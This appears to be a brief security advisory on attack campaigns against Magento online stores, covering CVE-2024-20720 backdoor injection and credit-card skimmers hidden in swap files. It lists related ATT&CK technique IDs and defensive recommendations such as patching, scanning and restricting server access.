Magento, eCommerce Attacks in Progress
Immediate Recommendation for Magento:
Update Software: It is crucial for Magento store owners to update their systems to the latest versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to patch known vulnerabilities and protect against future attacks.
https://www.malwarebytes.com/blog/news/2024/08/hundreds-of-online-stores-hacked-in-new-campaign are reporting a new campaign or variant. JoT will update as news becomes available. And thanks to the wonderful team at Alienvault and MITRE, these are relevant AA&CK IDs:
T1059.007 - JavaScript
T1598.003 - Spearphishing Link
T1185 - Man in the Browser
T1059.008 - Network Device CLI
T1059.001 - PowerShell
Recent Magento Vulnerabilities and Exploits
CVE-2024-20720: A critical vulnerability identified earlier in 2024, which allows attackers to inject a persistent backdoor into Magento servers. This vulnerability involves manipulating Magento's layout template system and has been exploited to install backdoors and inject malicious payloads, such as fake payment skimmers, into e-commerce websites.
E-skimming Attacks: Threat actors have been using swap files in compromised Magento websites to hide credit card skimmers and harvest payment information. This method allows malware to persist on the server even after cleanup attempts.
Ongoing Malware Campaigns: A new malware campaign has been reported to target e-commerce sites using Adobe's Magento platform. This campaign is designed to steal payment information from online shoppers.
Recommendations for Magento Store Owners
Update Software: It is crucial for Magento store owners to update their systems to the latest versions (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7) to patch known vulnerabilities and protect against future attacks.
Security Scans: Regularly run security scans, such as the eComscan scanner, to detect hidden backdoors and other indicators of compromise.
Restrict Access: Limit access to critical server functions via SSH, FTP, and CPanel to trusted IPs only. Implement website firewalls for additional protection.
Monitor for Suspicious Activity: Be vigilant for unusual activity, such as strange orders or unauthorized access attempts, which may indicate a security breach.
